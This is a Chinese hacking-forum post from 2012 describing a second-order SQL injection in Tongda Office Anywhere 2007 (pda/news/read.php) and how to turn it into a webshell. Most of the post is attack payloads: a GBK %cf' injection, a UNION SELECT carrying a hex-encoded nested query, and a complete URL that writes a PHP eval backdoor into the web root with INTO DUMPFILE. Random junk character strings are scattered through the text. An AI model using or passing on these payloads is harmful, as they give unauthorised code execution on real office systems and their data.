找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2542|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本% K: w1 b% J6 y2 v8 g& l
* l) o: Z# i* r9 A2 _+ n8 ~$ u+ I; J5 C

6 n7 o4 X6 g* NOffice Anywhere 2007 网络智能办公系统
! Z2 S' |( \2 e9 H. ~' B: h7 E( k 2 J9 {. h1 u$ L0 K% K
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
; \! D0 u) [/ V' g. a5 |
2 `3 ]4 l% M9 u( e
/ M! u% k" p$ Q& m: V5 P5 k: ~+ r这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的6 J- U3 u* k5 H; ^3 r4 [5 G% i

2 b8 W9 G+ H0 ?$ B% z/ G3 a# w例如:SELECT * from USER where USER_ID='{$USERNAME}'  ) n$ p) m: R; Y0 }: {! m. w
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
5 k: S6 f) y, H' f7 C  R2 d 6 M0 S& Y: e: b* s
这个时候我们是不是可以组合起来使用哪?
8 I0 a( g  I+ D
3 v5 v9 n4 }! r第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
  p, z- S3 l8 K0 ~union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,104 }! {5 H1 O" F" \  F
9 V3 G& z4 ?0 L4 K
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
$ a6 E+ r! N3 x9 M: S 8 x& L. }* n0 m8 a8 d, R% k# r
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
( G6 _1 E9 o3 v2 ^ / r3 j. W3 @; ^. M$ d2 R) D# A
那么我们用字符串格式带入进行hex编码
: ]) N: G- s4 @
3 ]) C* a( }$ |$ e. b  d6 d%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
/ p3 C4 {  ]; k
: s0 e' q& v9 K; s2 r+ L: g; D3 l测试ok,获取oa的webshell2 |7 x& z  O% f% Q" S* G

, o2 N8 g" T0 w( [6 ^/ p5 g
, `  K# O6 R' B9 t& Ppda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
4 Q% k$ Q* d9 U. C& L. S' ]: q直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表